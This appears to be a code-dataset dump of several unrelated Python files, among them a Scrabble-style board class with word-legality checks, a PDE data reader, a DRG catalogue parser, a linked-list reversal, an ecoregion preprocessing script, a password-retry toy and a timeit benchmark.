        boardPositionLetter = self.board[xPos, yPos].GetLetter()
        if not boardPositionLetter == tileLetter :
            hand.RemoveTileFromHand(tile)
            self.board[xPos, yPos] = tile

    def PlaceWord(self, word, anchor, hand, anchorIndex, playDirection) :
        """Place *word* on the board through *anchor*.

        anchorIndex is the index within the word of the letter sitting on the
        anchor square.  Each newly placed tile becomes a new anchor in the
        perpendicular direction; the consumed anchor is removed and the
        anchor list is re-validated.
        """
        relativeXPos = anchor.GetXPos()
        relativeYPos = anchor.GetYPos()
        if playDirection == 'across' :
            relativeXPos -= anchorIndex
            for i, tile in enumerate(word.GetTiles()) :
                self.PlaceTile(tile, hand, relativeXPos, relativeYPos, 'down')
                # FIX: value comparison (!=) instead of identity ('is not'),
                # which is unreliable for ints outside CPython's small-int cache.
                if i != anchorIndex :
                    self.anchors.append(Anchor(tile, relativeXPos, relativeYPos, 'down'))
                relativeXPos += 1
        if playDirection == 'down' :
            relativeYPos -= anchorIndex
            for i, tile in enumerate(word.GetTiles()) :
                self.PlaceTile(tile, hand, relativeXPos, relativeYPos, 'across')
                if i != anchorIndex :
                    self.anchors.append(Anchor(tile, relativeXPos, relativeYPos, 'across'))
                relativeYPos += 1
        self.anchors.remove(anchor)
        self.ValidateAnchors()

    def IsWordLegal(self, word, anchor, anchorIndex, playDirection) :
        """Return [bool, reason] describing whether the play is legal."""
        # word must have at least 2 letters
        if not self.BigEnough(word) :
            return [False, 'word not big enough']
        # word must not go off the board
        elif self.OffBoard(word, anchor, anchorIndex, playDirection) :
            return [False, 'word goes off the board']
        # at this point, if the anchor is the default (blank) anchor,
        # we can stop checking and confirm that the word is legal.
        # FIX: value comparison (==) instead of identity ('is') on strings.
        elif anchor.GetLetter() == ' ' :
            return [True, 'word with default anchor is legal :)']
        # otherwise we have more checks to make
        else :
            # anchor letter must match the word's letter at the anchor index
            if not self.AnchorIndexCorrect(word, anchor, anchorIndex) :
                return [False, 'anchorIndex is invalid']
            # the word must fit on the board correctly, aka spaces where word
            # will go must either be blank or equal to the placed letter
            elif not self.WordFits(word, anchor, anchorIndex, playDirection) :
                return [False, 'word does not fit in the board correctly']
            # the word must not create any illegal words with adjacent tiles
            elif self.WordCreatesInvalidWord(word, anchor, anchorIndex, playDirection) :
                return [False, 'word creates an invalid word when placed']
            else : return [True, 'word is legal :)']

    def PrintBoard(self) :
        """Pretty-print the grid to stdout (ASCII box drawing)."""
        # CONSISTENCY FIX: use self.size instead of the hard-coded 21 used
        # everywhere else in the class (behavior unchanged, size == 21).
        for i in range(self.size) :
            if (i == 0) :
                print(end=" ")
                for j in range(self.size) :
                    print('+---', end="")
                print('+')
            for j in range(self.size) :
                print(' |', self.board[j][i].GetLetter(), end="")
            print(' |')
            print(end=" ")
            for j in range(self.size) :
                print('+---', end="")
            print('+')

    def BigEnough(self, word) :
        """True when *word* has at least two tiles."""
        if not word.GetTiles() :
            return False
        elif len(word.GetTiles()) < 2 :
            return False
        else :
            return True

    def OutOfBounds(self, bound) :
        """True when a single coordinate falls outside the grid."""
        if bound < 0 or bound > self.size - 1:
            return True
        else :
            return False

    def OffBoard(self, word, anchor, anchorIndex, playDirection) :
        """True when the placed word would extend past either edge."""
        relativeXPos = anchor.GetXPos()
        relativeYPos = anchor.GetYPos()
        if playDirection == 'across' :
            upperBound = relativeXPos - anchorIndex
            lowerBound = relativeXPos + (len(word.GetTiles()) - anchorIndex - 1)
        if playDirection == 'down' :
            upperBound = relativeYPos - anchorIndex
            lowerBound = relativeYPos + (len(word.GetTiles()) - anchorIndex - 1)
        if self.OutOfBounds(upperBound) or self.OutOfBounds(lowerBound) :
            return True
        else :
            return False

    def AnchorIndexCorrect(self, word, anchor, anchorIndex) :
        """True when the word's letter at anchorIndex matches the anchor letter."""
        expectedAnchorLetter = anchor.GetLetter()
        actualAnchorLetter = word.GetTiles()[anchorIndex].GetLetter()
        # FIX: value comparison (==) instead of identity ('is') on strings.
        if expectedAnchorLetter == actualAnchorLetter :
            return True
        else :
            return False

    def TileFits(self, tile, xPos, yPos) :
        """True when (xPos, yPos) is blank or already holds the same letter."""
        if self.board[xPos, yPos].GetLetter() == ' ' :
            return True
        elif self.board[xPos, yPos].GetLetter() == tile.GetLetter() :
            return True
        else :
            return False

    def WordFits(self, word, anchor, anchorIndex, playDirection) :
        """True when every square the word covers accepts its letter."""
        relativeXPos = anchor.GetXPos()
        relativeYPos = anchor.GetYPos()
        if playDirection == 'across' :
            upperBound = relativeXPos - anchorIndex
            lowerBound = relativeXPos + (len(word.GetTiles()) - anchorIndex - 1)
            for i in range(upperBound, lowerBound + 1) :
                if not self.TileFits(word.GetTiles()[i - upperBound], i, relativeYPos) :
                    return False
        if playDirection == 'down' :
            upperBound = relativeYPos - anchorIndex
            lowerBound = relativeYPos + (len(word.GetTiles()) - anchorIndex - 1)
            for i in range(upperBound, lowerBound + 1) :
                if not self.TileFits(word.GetTiles()[i - upperBound], relativeXPos, i) :
                    return False
        return True

    def PrefixAndSuffixClear(self, word, anchor, anchorIndex, playDirection) :
        """Check the full line of tiles the placed word joins onto.

        Walks outward from both ends of the word collecting any pre-existing
        prefix/suffix tiles.  Returns True when there are none, or when the
        combined tiles still form a dictionary word.
        """
        relativeXPos = anchor.GetXPos()
        relativeYPos = anchor.GetYPos()
        if playDirection == 'across' :
            upperBound = relativeXPos - anchorIndex
            prefixUpperBound = upperBound - 1
            upperOutOfBounds = self.OutOfBounds(prefixUpperBound)
            if upperOutOfBounds : upperEqualsSpace = False
            else : upperEqualsSpace = self.board[prefixUpperBound, relativeYPos].GetLetter() == ' '
            lowerBound = relativeXPos + (len(word.GetTiles()) - anchorIndex - 1)
            suffixLowerBound = lowerBound + 1
            lowerOutOfBounds = self.OutOfBounds(suffixLowerBound)
            # BUG FIX: the original assigned lowerOutOfBounds = False here,
            # which both cleared the bounds flag and left lowerEqualsSpace
            # undefined (UnboundLocalError) whenever the suffix square was off
            # the board.  The 'down' branch below shows the intended form.
            if lowerOutOfBounds : lowerEqualsSpace = False
            else : lowerEqualsSpace = self.board[suffixLowerBound, relativeYPos].GetLetter() == ' '
            # Nothing adjacent on either side: trivially clear.
            if not upperOutOfBounds and upperEqualsSpace and not lowerOutOfBounds and lowerEqualsSpace :
                return True
            # Scan left past any existing prefix tiles.
            while not upperOutOfBounds and not upperEqualsSpace :
                prefixUpperBound -= 1
                upperOutOfBounds = self.OutOfBounds(prefixUpperBound)
                if upperOutOfBounds : upperEqualsSpace = False
                else : upperEqualsSpace = self.board[prefixUpperBound, relativeYPos].GetLetter() == ' '
            # Scan right past any existing suffix tiles.
            while not lowerOutOfBounds and not lowerEqualsSpace :
                suffixLowerBound += 1
                lowerOutOfBounds = self.OutOfBounds(suffixLowerBound)
                # BUG FIX: same lowerOutOfBounds/lowerEqualsSpace typo as
                # above; the original could loop forever at the board edge.
                if lowerOutOfBounds : lowerEqualsSpace = False
                else : lowerEqualsSpace = self.board[suffixLowerBound, relativeYPos].GetLetter() == ' '
            # Assemble prefix + word + suffix and look it up in the dictionary.
            fullWord = []
            for i in range(prefixUpperBound + 1, upperBound) :
                fullWord.append(self.board[i, relativeYPos])
            fullWord += word.GetTiles()
            for i in range(lowerBound + 1, suffixLowerBound) :
                fullWord.append(self.board[i, relativeYPos])
            return Words().ExactWordSearch(Word(fullWord))
        if playDirection == 'down' :
            upperBound = relativeYPos - anchorIndex
            prefixUpperBound = upperBound - 1
            upperOutOfBounds = self.OutOfBounds(prefixUpperBound)
            if upperOutOfBounds : upperEqualsSpace = False
            else : upperEqualsSpace = self.board[relativeXPos, prefixUpperBound].GetLetter() == ' '
            lowerBound = relativeYPos + (len(word.GetTiles()) - anchorIndex - 1)
            suffixLowerBound = lowerBound + 1
            lowerOutOfBounds = self.OutOfBounds(suffixLowerBound)
            if lowerOutOfBounds : lowerEqualsSpace = False
            else : lowerEqualsSpace = self.board[relativeXPos, suffixLowerBound].GetLetter() == ' '
            if not upperOutOfBounds and upperEqualsSpace and not lowerOutOfBounds and lowerEqualsSpace :
                return True
            while not upperOutOfBounds and not upperEqualsSpace :
                prefixUpperBound -= 1
                upperOutOfBounds = self.OutOfBounds(prefixUpperBound)
                if upperOutOfBounds : upperEqualsSpace = False
                else : upperEqualsSpace = self.board[relativeXPos, prefixUpperBound].GetLetter() == ' '
            while not lowerOutOfBounds and not lowerEqualsSpace :
                suffixLowerBound += 1
                lowerOutOfBounds = self.OutOfBounds(suffixLowerBound)
                if lowerOutOfBounds : lowerEqualsSpace = False
                else : lowerEqualsSpace = self.board[relativeXPos, suffixLowerBound].GetLetter() == ' '
            fullWord = []
            for i in range(prefixUpperBound + 1, upperBound) :
                fullWord.append(self.board[relativeXPos, i])
            fullWord += word.GetTiles()
            for i in range(lowerBound + 1, suffixLowerBound) :
                fullWord.append(self.board[relativeXPos, i])
            return Words().ExactWordSearch(Word(fullWord))

    def WordCreatesInvalidWord(self, word, anchor, anchorIndex, playDirection) :
        """True if placing *word* would form any invalid word on the board."""
        invalidWord = False
        # The word itself, together with any existing prefix/suffix, must be valid.
        if not self.PrefixAndSuffixClear(word, anchor, anchorIndex, playDirection) :
            invalidWord = True
        # Every newly placed tile must also form a valid perpendicular word.
        for i in range(len(word.GetTiles())) :
            tile = word.GetTiles()[i]
            temp = Word([tile])
            # FIX: !=/== value comparisons instead of 'is not'/'is' identity
            # checks on ints and string literals.
            if i != anchorIndex and playDirection == 'across':
                x = anchor.GetXPos() - anchorIndex + i
                y = anchor.GetYPos()
                if not self.PrefixAndSuffixClear(temp, Anchor(tile, x, y), 0, 'down') :
                    invalidWord = True
            if i != anchorIndex and playDirection == 'down':
                x = anchor.GetXPos()
                y = anchor.GetYPos() - anchorIndex + i
                if not self.PrefixAndSuffixClear(temp, Anchor(tile, x, y), 0, 'across') :
                    invalidWord = True
        return invalidWord

    def _SquareEmpty(self, xPos, yPos):
        """True when (xPos, yPos) is off the board or holds a blank tile."""
        if self.OutOfBounds(xPos) or self.OutOfBounds(yPos):
            return True
        return self.board[xPos, yPos].GetLetter() == ' '

    def ValidateAnchors(self):
        """Drop anchors whose neighbours along their direction are occupied.

        BUG FIXES vs the original: (1) it read anchor.xPos directly instead of
        the xPos local obtained via GetXPos(); (2) it indexed the raw grid, so
        an anchor on the right/bottom edge raised IndexError and an anchor at
        x==0 or y==0 silently wrapped around to the opposite edge.  Off-board
        neighbours are now treated as empty.
        """
        badAnchors = []
        for anchor in self.anchors:
            xPos = anchor.GetXPos()
            yPos = anchor.GetYPos()
            if anchor.GetDirection() == 'across':
                if not (self._SquareEmpty(xPos + 1, yPos) and self._SquareEmpty(xPos - 1, yPos)):
                    badAnchors.append(anchor)
            elif anchor.GetDirection() == 'down':
                if not (self._SquareEmpty(xPos, yPos + 1) and self._SquareEmpty(xPos, yPos - 1)):
                    badAnchors.append(anchor)
        for anchor in badAnchors:
            self.anchors.remove(anchor)
3c4b3a6199e925be395044e989719eeb826cfbe7 | Python | jbernrd2/Talbot_Effect | /Data_Reader.py | UTF-8 | 1,346 | 3.828125 | 4 | [] | no_license | ###################### Code for opening Data files ############################
# This code takes a data file from a PDE solution, and returns the real and
# imaginary parts of the solution, as well as the position that each of these
# data points as an array
###############################################################################
# data: The data file that you wish to access
# index: 0 or 'real' for real part of solution
# 1 or 'imag' for imaginary part of solution
# 2 or 'x' for x position
def listReturn(data, index):
    """Return one column of a comma-separated PDE-solution file as floats.

    data  -- path of the data file to read
    index -- 0 or 'real' for the real part of the solution,
             1 or 'imag' for the imaginary part,
             2 or 'x'    for the x position

    Lines without commas (headers, blanks) are skipped.  On an invalid
    *index* a message is printed and 0 is returned, matching the original
    error convention.
    """
    if isinstance(index, str):
        normalized = index.upper()
        if normalized == 'REAL':
            index = 0
        elif normalized == 'IMAG':
            index = 1
        elif normalized == 'X':
            index = 2
        else:
            print('Invalid argument for input: index')
            return 0
    elif isinstance(index, int):
        # BUG FIX: the original tested `index < 0 and index > 2`, which is
        # never true, so bad integer indices fell through and later raised
        # IndexError.  It also never returned on the error path.
        if index < 0 or index > 2:
            print('Invalid argument for input: index')
            return 0
    output = []
    with open(data) as f:
        for raw_line in f:
            line = raw_line.strip().split(',')
            # Single-token lines carry no comma-separated data; skip them.
            if len(line) != 1:
                output.append(float(line[index]))
    return output
import numpy as np
import matplotlib.pyplot as plt
#plt.plot(listReturn('LinSch_at_t_0.3x.txt','Real'))
| true |
8510d003d5da6cf2e4b8f9bfa3b473ce59f14ade | Python | josefondrej/medical-ide-poc | /dev_utils/parse_drg_catalogue.py | UTF-8 | 477 | 2.640625 | 3 | [
"MIT"
] | permissive | from pandas import read_excel, set_option
# Widen pandas console output so wide frames print without truncation.
set_option("display.max_columns", 20)
set_option("display.width", 500)

catalogue_path = "SwissDRG-Version_10_0_Fallpauschalenkatalog_AV_2021_2021.xlsx"
# Load the acute-care ("Akutspitäler") sheet; the first 7 rows are preamble.
df = read_excel(catalogue_path, sheet_name="Akutspitäler", skiprows=7)
# Keep only the DRG code (column 0) and its description text (column 2).
df = df.iloc[:, [0, 2]]
df.columns = ["code", "text"]
df = df.set_index("code")
# Map each code to its text, then flatten into [code, text] pairs and print.
code_to_text = df["text"].to_dict()
code_text = [[code, text] for code, text in code_to_text.items()]
print(code_text)
| true |
9217807182adfd5967309c87f53a346b0507e5bc | Python | adamafriansyahb/algorithm-practice | /reverse_linkedlist.py | UTF-8 | 341 | 3.5 | 4 | [] | no_license | # HackerRank Challange: Reverse a Linked List - Problem Solving -> Data Structures
def reverse_llist(head):
    """Reverse a singly linked list in place and return the new head.

    BUG FIXES: the original set `current.next = None` inside the loop, which
    severed every link instead of reversing them (it returned the old tail
    with the rest of the list unreachable).  It also dereferenced
    `head.next` before the loop, crashing on an empty list; this version
    returns None for head=None.
    """
    prev = None
    current = head
    while current:
        after = current.next    # remember the unprocessed remainder
        current.next = prev     # point this node back at the reversed part
        prev = current
        current = after
    # prev is now the old tail, i.e. the new head.
    return prev
| true |
34cd3c1d2627721f196af0996e2691d4fd7916fe | Python | sreisig/math561-final | /preprocess.py | UTF-8 | 765 | 2.796875 | 3 | [] | no_license | import pandas as pd
def extract_eco1_windspeed_fuelmoisture():
    """
    Extracts average windspeed and fuel moisture by level 1 ecoregion (data originally segmented by level 3 ecoregion)
    Assumes that fm_ws_monthly_ecn.csv has been moved from Nagy's repo into data/
    """
    frame = pd.read_csv('./data/fm_ws_monthly_ecn.csv')
    # L3 codes are dotted (e.g. "1.2.3"); the level-1 code is the leading part.
    frame['NA_L1CODE'] = frame['NA_L3CODE'].str.split('.').str[0]
    # Average every column within each level-1 ecoregion.
    return frame.groupby('NA_L1CODE').mean()
def save_eco1_windspeed_fuelmoisture():
    """
    Saves avg windspeed, fuelmoisture to file
    """
    # Compute the level-1 summary and write it straight to CSV.
    extract_eco1_windspeed_fuelmoisture().to_csv('./data/l1_windspeed_fuelmoisture.csv')
df.to_csv('./data/l1_windspeed_fuelmoisture.csv')
if __name__ == "__main__":
    # Script entry point: regenerate data/l1_windspeed_fuelmoisture.csv.
    save_eco1_windspeed_fuelmoisture()
| true |
588f8643e171d9c40bbbd739dd83af738d1da71f | Python | Reinelin/password_retry | /password.py | UTF-8 | 264 | 3.46875 | 3 | [] | no_license | password = 'a123456'
# The expected password.  BUG FIX: the original defined this variable but
# then compared against a duplicated 'a123456' literal, so changing the
# variable had no effect; the loop now checks against `password`.
password = 'a123456'
# Give the user three attempts to log in.
i = 3
while i > 0:
    i -= 1
    pwd = input('please enter password:')
    if pwd == password:
        print('succesful login')
        break
    else:
        print('wrong password')
        if i > 0:
            print(i, 'more chance')
        else:
            print('no more chance')
| true |
369e29adcf464645f572777948d926e61a5055c5 | Python | jatinmayekar/Kalman_Filter | /s_3_e2_time.py | UTF-8 | 804 | 3.546875 | 4 | [
"MIT"
] | permissive | # importing the required module
import timeit
# code snippet to be executed only once
mysetup = "from math import sqrt"
# code snippet whose execution time is to be measured
mycode = '''
def solution(ranks):
# write your code in Python 3.6
count = 0 #initialize counter for num of soldiers who can report to some superior
n = sorted(ranks) #order the list example : 0 1 3 3 4 4
for i in n: #take each item from the sorted list
if i+1 in n: #check if a higher number which is one greater than i exists
count += 1 #if true increment counter
print(count)
return count
#solution([4,4,3,3,1,0])
li = list(range(1,100))
solution(li)
#solution([3, 4, 3, 0, 2, 2, 3, 0, 0])
'''
# timeit statement
print (timeit.timeit(setup = mysetup,
stmt = mycode,
number = 10000) )
| true |